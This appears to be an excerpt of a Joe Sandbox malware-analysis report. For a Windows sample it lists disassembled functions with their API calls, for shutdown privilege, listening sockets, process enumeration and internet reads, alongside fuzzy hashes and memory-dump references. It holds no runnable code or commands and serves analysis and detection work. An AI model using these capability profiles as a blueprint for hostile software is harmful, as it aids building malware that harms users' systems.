Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 4338271a1102688a1077cfbf8e8c3fca4e14e1de12ea5e7aa7cb5902040ba2b5
Instruction ID: da40a7acc53fe3f822b62efa094550fe69f607757239587d584944d28938c9ad
Opcode Fuzzy Hash: 4338271a1102688a1077cfbf8e8c3fca4e14e1de12ea5e7aa7cb5902040ba2b5
Instruction Fuzzy Hash: 2D3192310693859FC301EF64D8958EFBBA8AE51305F404E2EF8D592191EB31DA1CCB5B

Function 002B51BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 002A87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002A882B
Part of subcall function 002A87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002A8858
Part of subcall function 002A87E1: GetLastError.KERNEL32 ref: 002A8865

ExitWindowsEx.USER32(?,00000000), ref: 002B51F9

Strings

@, xrefs: 002B51EC
SeShutdownPrivilege, xrefs: 002B51C9
, xrefs: 002B51E7

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: d1a52490b09a74146ab7467ea4f6e3be569a8ad3222952898359a772b5877f04
Instruction ID: fc9a699d304f79ae79ae69d53c28c81c8cc330ff5c3651deae8506de1c5a34ee
Opcode Fuzzy Hash: d1a52490b09a74146ab7467ea4f6e3be569a8ad3222952898359a772b5877f04
Instruction Fuzzy Hash: 5B01FC316B36225BE7286668AC9BFF773589B057C0F144421FD57DA0D1D9911C204994

Function 002C6283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 002C62DC
WSAGetLastError.WSOCK32(00000000), ref: 002C62EB
bind.WSOCK32(00000000,?,00000010), ref: 002C6307
listen.WSOCK32(00000000,00000005), ref: 002C6316
WSAGetLastError.WSOCK32(00000000), ref: 002C6330
closesocket.WSOCK32(00000000,00000000), ref: 002C6344

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 75b589801c859c0d3848f6cc4f4cfa3325da1c2a53a3fa6b3c9ec4cc207608f6
Instruction ID: ff2d02c35f43d9d777a690d296c088f0908b34284d6cfc735557f6c1824153a0
Opcode Fuzzy Hash: 75b589801c859c0d3848f6cc4f4cfa3325da1c2a53a3fa6b3c9ec4cc207608f6
Instruction Fuzzy Hash: 5D21D030A102009FDB00EF64D94DF6EB7A9EF49720F248259E816A73D1CB70AD55CF55

Function 00265520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00270DB6: std::exception::exception.LIBCMT ref: 00270DEC
Part of subcall function 00270DB6: __CxxThrowException@8.LIBCMT ref: 00270E01

_memmove.LIBCMT ref: 002A0258
_memmove.LIBCMT ref: 002A036D
_memmove.LIBCMT ref: 002A0414

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: 27d2ca46e629787290b61c302975ae2efcbb3bc162d9e2d77776245822534eda
Instruction ID: 84083f3d4217e0cf8acafe95ba414bbdb0f6385349259ec729464d9a1f5fd1ea
Opcode Fuzzy Hash: 27d2ca46e629787290b61c302975ae2efcbb3bc162d9e2d77776245822534eda
Instruction Fuzzy Hash: CB02D170A20205DBCF04DF64D9C1AAEBBB9EF45300F5480A9E80ADB255EB71DD64CF95

Function 00251287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623

DefDlgProcW.USER32(?,?,?,?,?), ref: 002519FA
GetSysColor.USER32(0000000F), ref: 00251A4E
SetBkColor.GDI32(?,00000000), ref: 00251A61

Part of subcall function 00251290: DefDlgProcW.USER32(?,00000020,?), ref: 002512D8

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 72688202cfbeabb8d03fbf3034c80f81f598b41a0cbe5cfeb1eadc39862b918c
Instruction ID: b6e4ccdfc7fb9d4cb249d3566d8f4b8d09dfd2776b7c4abb24d5a84f9a566ca1
Opcode Fuzzy Hash: 72688202cfbeabb8d03fbf3034c80f81f598b41a0cbe5cfeb1eadc39862b918c
Instruction Fuzzy Hash: 77A14878132586BAE62BAF285C58FBB255CDB4A343F14011EFC02D11D2CA709D39DB79

Function 002C6747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 002C7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002C7DB6

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 002C679E
WSAGetLastError.WSOCK32(00000000), ref: 002C67C7
bind.WSOCK32(00000000,?,00000010), ref: 002C6800
WSAGetLastError.WSOCK32(00000000), ref: 002C680D
closesocket.WSOCK32(00000000,00000000), ref: 002C6821

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: d5b0764efa4a91c46cc1f29c8fe6fcb694a7df639bcd3059c4c80f85dba80d7a
Instruction ID: 6ddee37e5bad03a954c145ba4c4c633657c88dd4bdc20e109f845b281920d553
Opcode Fuzzy Hash: d5b0764efa4a91c46cc1f29c8fe6fcb694a7df639bcd3059c4c80f85dba80d7a
Instruction Fuzzy Hash: 9B41B275A20200AFEB50AF248C8AF6E77E8DF45714F04855CFD16AB3D2CAB09D548F95

Function 002D5376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 002D53C5
IsWindowEnabled.USER32 ref: 002D53D3
GetForegroundWindow.USER32(?,?,00000001), ref: 002D53E0
IsIconic.USER32 ref: 002D53EE
IsZoomed.USER32 ref: 002D53FC

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 402739ab2e3b1aca2c8bf1f547c2080ce25e653101eecdaac694c9bff66296aa
Instruction ID: 58fe825574948dc384fe6bbbe9c424cc5d47749a4634e9cd3f3c550b12368381
Opcode Fuzzy Hash: 402739ab2e3b1aca2c8bf1f547c2080ce25e653101eecdaac694c9bff66296aa
Instruction Fuzzy Hash: BC1108317219215FE7215F26EC48A5EBB9CEF443A1B40402AF846D7341CBF0DD11CA98

Function 002A80A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002A80C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002A80CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002A80D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002A80E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002A80F6

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: ee86d347d6181f2faf88918d8b85da10d6a873cb2277b229cf125ca7b07e2ad8
Instruction ID: 22e786574175e441bac68a018f2bfa732e822d7d7f1df782f688b5c07c207a9f
Opcode Fuzzy Hash: ee86d347d6181f2faf88918d8b85da10d6a873cb2277b229cf125ca7b07e2ad8
Instruction Fuzzy Hash: 68F0CD30612215AFEB100FA4EC8CE6B3BBCEF8A755B00002AF90AD3150CF60DD12DA60

Function 00254B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00254AD0), ref: 00254B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00254B57

Strings

kernel32.dll, xrefs: 00254B40
GetNativeSystemInfo, xrefs: 00254B51

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: ed6bec537d3a68d3fc7570c7e9d3581d50f7e90c1696bb2672132f690d4e6f09
Instruction ID: ec8fdee6924f83ddc640a0127788e4759345e1c07fe2897b955ceca260ba3006
Opcode Fuzzy Hash: ed6bec537d3a68d3fc7570c7e9d3581d50f7e90c1696bb2672132f690d4e6f09
Instruction Fuzzy Hash: F4D01234E20713CFD7609F31E918B06B6D4AF06359B15883B9897D6650D770DCD0C65C

Function 002CEE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 002CEE3D
Process32FirstW.KERNEL32(00000000,?), ref: 002CEE4B

Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22

Process32NextW.KERNEL32(00000000,?), ref: 002CEF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 002CEF1A

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 071a332146272510a09db9095603c75001bc419ee1e50519feb32f2c57a92099
Instruction ID: a4a3c21f91955b95f9c01ab16e3aabe6ded29edf068fb3451d782170a343592e
Opcode Fuzzy Hash: 071a332146272510a09db9095603c75001bc419ee1e50519feb32f2c57a92099
Instruction Fuzzy Hash: B551AC71518311AFD310EF20DC85E6BB7E8EF94710F10492DF895972A1EB70E918CB96

Function 002AE616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 002AE628

Strings

|, xrefs: 002AE658
(, xrefs: 002AE66E

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: f5325dfec32fa446d458743f0ed082a78cca0a3566b739a581d83182d6425fc7
Instruction ID: 50b71b4632b60905444f84b92f27c8105f88b71432ea6f7b5bf31828c6118959
Opcode Fuzzy Hash: f5325dfec32fa446d458743f0ed082a78cca0a3566b739a581d83182d6425fc7
Instruction Fuzzy Hash: C4322575A107059FDB28CF59C48196AB7F0FF48310B16C46EE89ADB3A1EB70E952CB44

Function 002C22EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,002C180A,00000000), ref: 002C23E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 002C2418

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 068b7e09681b5ab1901a7c8824536c2861923e1d0403309c17b3e80f93ce949f
Instruction ID: a76cbf7f1ddc323ac66520b3e3feb7732a145cb89d633553e44f1e83d9cebcdf
Opcode Fuzzy Hash: 068b7e09681b5ab1901a7c8824536c2861923e1d0403309c17b3e80f93ce949f
Instruction Fuzzy Hash: 7B41047192420AFFEB20DE94DC85FBBB7ACEB40314F10416EFA05A7140DEB49E699A50

Function 002BB333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 002BB343
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 002BB39D
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 002BB3EA

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 4a8b0a1b7d53e2f7d8198ea1e6c222517cdef9f8f8aad209c2900de0a5a59d8a
Instruction ID: 7a1d7d7860d0efa76000b60595fc3b3a769af048f8db3383ef88c3ab0bb0cfc7
Opcode Fuzzy Hash: 4a8b0a1b7d53e2f7d8198ea1e6c222517cdef9f8f8aad209c2900de0a5a59d8a
Instruction Fuzzy Hash: 7B216035A10618EFCB00EFA5D885AEDBBB8FF49311F1480AAE905AB351CB319D65CF54

Function 002A87E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00270DB6: std::exception::exception.LIBCMT ref: 00270DEC
Part of subcall function 00270DB6: __CxxThrowException@8.LIBCMT ref: 00270E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002A882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002A8858
GetLastError.KERNEL32 ref: 002A8865

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: dd98a6c6cbe2b406f6e397f376bbf6c834401d8342f92d099bf8cf2cadf0472c
Instruction ID: 26276d54076423fccbd55e9971b00263dfe90319286792bef382b17cf200593d
Opcode Fuzzy Hash: dd98a6c6cbe2b406f6e397f376bbf6c834401d8342f92d099bf8cf2cadf0472c
Instruction Fuzzy Hash: 791190B1824305AFD718DF94EC85D2BB7E8EB05310B10852EE45683201DE30AC508B60

Function 002A874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 002A8774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 002A878B
FreeSid.ADVAPI32(?), ref: 002A879B

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 57614fe386a768636e77bda44c71c57c7af39e1575a08513ff256cd561da8781
Instruction ID: e6f7b9cd0ca00153206445c60cc466addeab658550223b8a4e8e5a8438aeb5b6
Opcode Fuzzy Hash: 57614fe386a768636e77bda44c71c57c7af39e1575a08513ff256cd561da8781
Instruction Fuzzy Hash: DDF04975E1130DBFDF00DFF4DD89AAEBBBCEF08201F5044A9A902E3281E6716A048B54

Function 002B8889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 002B889B

Part of subcall function 0027520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,002B8F6E,00000000,?,?,?,?,002B911F,00000000,?), ref: 00275213
Part of subcall function 0027520A: __aulldiv.LIBCMT ref: 00275233

Strings

0e1, xrefs: 002B8892

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID: 0e1
API String ID: 2893107130-2457772890
Opcode ID: fe1717a292013ecb0a1a0eda30628b382b7a6c03e334d3feb6a8bdf121d1f731
Instruction ID: d2adad1343f4702ec73448355393f2529ed2112b5a3250b2dbaa2d79318c1689
Opcode Fuzzy Hash: fe1717a292013ecb0a1a0eda30628b382b7a6c03e334d3feb6a8bdf121d1f731
Instruction Fuzzy Hash: D521B4326355118BC729CF65D841A92B3E5EFA9311F688E6CD0F9CB2C0CA74B905CB54

Function 002BC6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 002BC6FB
FindClose.KERNEL32(00000000), ref: 002BC72B

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: a4431e9abfdecdadb9004df9c791f8803d605a03a49c7a2ae6b26f2ef4b7363d
Instruction ID: 6f048f1682c3480c722b352e4dc348f6b35958dd19b9c907f277fff713bc2a18
Opcode Fuzzy Hash: a4431e9abfdecdadb9004df9c791f8803d605a03a49c7a2ae6b26f2ef4b7363d
Instruction Fuzzy Hash: AB11A5716106009FDB10DF29D84996AF7E8FF45321F14851EF8A5CB291DB30AC15CF85

Function 002BA06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,002C9468,?,002DFB84,?), ref: 002BA097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,002C9468,?,002DFB84,?), ref: 002BA0A9

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 2d1e6a2a29f15fa3bf9bf9f4455db4b9bc8340d516fa4e6f34ec4bfb79edc928
Instruction ID: 166cf30e6fee2c024257edabadf368098bc01d44b4ff180a5e531c7eab4babb9
Opcode Fuzzy Hash: 2d1e6a2a29f15fa3bf9bf9f4455db4b9bc8340d516fa4e6f34ec4bfb79edc928
